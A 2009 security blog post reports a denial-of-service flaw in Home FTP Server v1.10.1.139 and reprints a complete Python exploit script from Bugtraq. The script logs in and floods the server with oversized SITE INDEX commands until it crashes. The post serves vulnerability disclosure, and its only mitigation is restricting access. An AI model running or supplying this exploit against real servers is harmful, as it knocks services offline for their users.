Security Information and Review

Collection of security information and review

DOS Vulnerability in Home FTP Server

Author : Admin

Home FTP Server is a FTP Server program that allows use to share any files directly form our PC. With this program, we can build and implementation a FTP server easily. Home FTP Server use web based administration support, so we can manage, monitoring and add user very easy. Home FTP Server supports implicit or explicit Transport Secure Layer ( TSL ), virtual directories and banned IP address. Home FTP server has all feature that even some of the commercial FTP server but It’s free without any limitations and very efficient.

In November 16, 2009, a vulnerability has been discovered in Home FTP Server. With this vulnerability, an attacker can exploit with malicious code to cause Denial of Service ( DOS ). At the end of the exploit, Home FTP server will crash and stop responding. This vulnerability is caused by an error when processing malformed site index commands. This issue is affected in Home FTP Server v1.10.1.139 and other versions may also be affected.

Home FTP Server Administration

Home FTP Server Administration


At present, this vulnerability is not patch by vendor. So, the best solution for this case is restrict access to Home FTP server to trusted users only. See following code, how we can exploit this vulnerability ( original source at http://seclists.org/bugtraq/2009/Nov/111 ).

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
 
#!/usr/bin/python
import socket
import sys
 
def Usage():
    print ("Usage:  ./expl.py <serv_ip>      <Username> <password>\n")
    print ("Example:./expl.py 192.168.48.183 anonymous anonymous\n")
if len(sys.argv) <> 4:
        Usage()
        sys.exit(1)
else:
    hostname=sys.argv[1]
    username=sys.argv[2]
    passwd=sys.argv[3]
    test_string="a"*30
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    for i in range(1,30):
        try:
            sock.connect((hostname, 21))
        except:
            print ("Connection error!")
            sys.exit(1)
        r=sock.recv(1024)
        print "[+] "+ r
        sock.send("user %s\r\n" %username)
        print "[-] "+ ("user %s\r\n" %username)
        r=sock.recv(1024)
        print "[+] "+ r
        sock.send("pass %s\r\n" %passwd)
        print "[-] "+ ("pass %s\r\n" %passwd)
        r=sock.recv(1024)
        print "[+] "+ r
 
 
        for i in range(1,20):
            sock.send("SITE INDEX "+ test_string*i +"\r\n")
            print "[-] "+ ("SITE INDEX "+ test_string +"\r\n")
            r=sock.recv(1024)
            print "[+] "+ r
 
        sock.close()
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
 
    sys.exit(0);
Share and Enjoy: These icons link to social bookmarking sites where readers can share and discover new web pages.
  • Digg
  • del.icio.us
  • Netvouz
  • DZone
  • ThisNext
  • MisterWong
  • Wists
  • Technorati
  • YahooMyWeb
  • Slashdot
  • StumbleUpon
Categories: Application Security
P :
Hi, I really like your template, its clean and SEO friendly. Is this hosted on Blogspot or Wordpress? Any tips on making my blogspot blog better? Many thanks Phoneixcapital.blogpsot.com
19 November 09 at 11:33
@p : thank's. Not in blogspot / wordpress but self hosting.
19 November 09 at 16:16
If you like this posts, please leave messages / comments.